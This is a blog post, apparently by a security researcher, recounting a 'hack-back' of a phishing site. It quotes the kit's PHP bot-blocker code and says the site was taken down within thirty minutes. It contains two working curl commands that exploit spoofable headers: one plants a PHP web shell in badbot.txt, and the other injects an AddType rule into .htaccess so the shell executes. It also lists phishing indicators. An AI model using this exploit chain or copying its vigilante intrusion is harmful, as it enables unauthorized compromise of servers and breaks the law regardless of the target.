Hack-back: a tale of embarrassing phishing campaign

/
/
/
2861 Views

UPDATE: 17th January 2020: Another landing page disabled.


UPDATE: 15th January 2020: I posted this to reddit.com/r/hacking and it seems like the mods didn’t like it, they consider my blog post as a self-promotion and spam. Thank you!
You have been permanently banned from participating in r/hacking
You have been permanently banned from participating in r/ActLikeYouBelong
You have been permanently banned from participating in r/AskNetsec


Today was a good day, I received a phishing email to by Protonmail address. I don’t have a copy of the email, as I reported it and later deleted it as spam. Thankfully, other security research took screenshots yesterday:

Credits to @d4rkm0de
Figured I can do a write-up after the tweet

The phishing mail was included a Bitly link (URL shortener). The nice thing about Bitly is that you can add a plus (+) character on the end of URL and it will show you how many people clicked the link and what is the location of redirect:

https://bitly.com/2R1paP9+

More than 100 people clicked the link when I received the phishing email. I was a little bit bored, so I started poking around a little bit. I quickly found a directory listing with full source code:

Prevent this by adding “Options -Indexes” to .htaccess

The landing page was written in PHP, it was kinda a generic one, nothing unordinary, except a blocker.phpfile. It was a code to block security researchers and malware hunters based on IP ranges and user-agent strings. If any of the above matched, the IP was denied access in .htaccess and added to a file badbot.txt for a further investigation.

The fourth line got my attention, as it was very unique:

$ipa = $_SERVER['HTTP_CLIENT_IP']? $_SERVER['HTTP_CLIENT_IP'] : ($_SERVER['HTTP_X_FORWARDE‌​D_FOR'] ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR'] );
$useragent = $_SERVER['HTTP_USER_AGENT'];

if(isset($_POST['gotcha'])){
     blockBot($ipa);
}

The thing in web security is, you should never trust user input. In this case, you can spoof both HTTP_CLIENT_IP and HTTP_X_FORWARDED_FOR headers.

If you called the blocker.php script with a POST request and gotcha parameter, the IP address was blocked:

function blockBot($ip){
$bot = 'deny from '.$ip;
$myfile = file_put_contents('.htaccess', PHP_EOL.$bot.PHP_EOL , FILE_APPEND | LOCK_EX);
header('HTTP/1.0 404 Not Found');
die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
}

If the user-agent matched any array value like InfoSec, Kaspersky, ..., the IP was added to badbot.txt:

foreach($bad as $zbal) {
    if(stripos($useragent,$zbal) !== false) {
        file_put_contents('badbot.txt', $ipa, FILE_APPEND | LOCK_EX);
        blockBot($ipa);
    }
}

So I quickly figured out that I can insert PHP shell to badbot.txt and force .htaccess to execute .txt files as PHP. The trick from the 2000s used to hack insecure PHP uploads 🙂

Inserting PHP web shell into badbot.txt (learned this one from Sucuri):

curl $url/blocker.php -H "CLIENT-IP: <?php extract($_REQUEST);$a($b); ?> " -H "User-agent: InfoSec"

Forcing Apache to execute .txt as PHP via .htaccess:

curl $url/blocker.php -H "CLIENT-IP: \r\nAddType application/x-httpd-php .txt\r\n" -H "User-agent: google" --data "gotcha=1"

This can be a very nice CTF challenge, full source-code here: https://gist.github.com/vavkamil/b115ef829329f9fd3876c077e843641b

In the end, I was able to take down the phishing infrastructure in less than 30 minutes, and maybe saved someone from a compromise. Mess with the best, die like the rest!

Indicators of compromise (IoC):

  • urielsilveira[dot]com
  • keyword.tech.2017[at]gmail.com
  • alvinwalker247[at]gmail.com
Phishing out of service
This div height required for enabling the sticky sidebar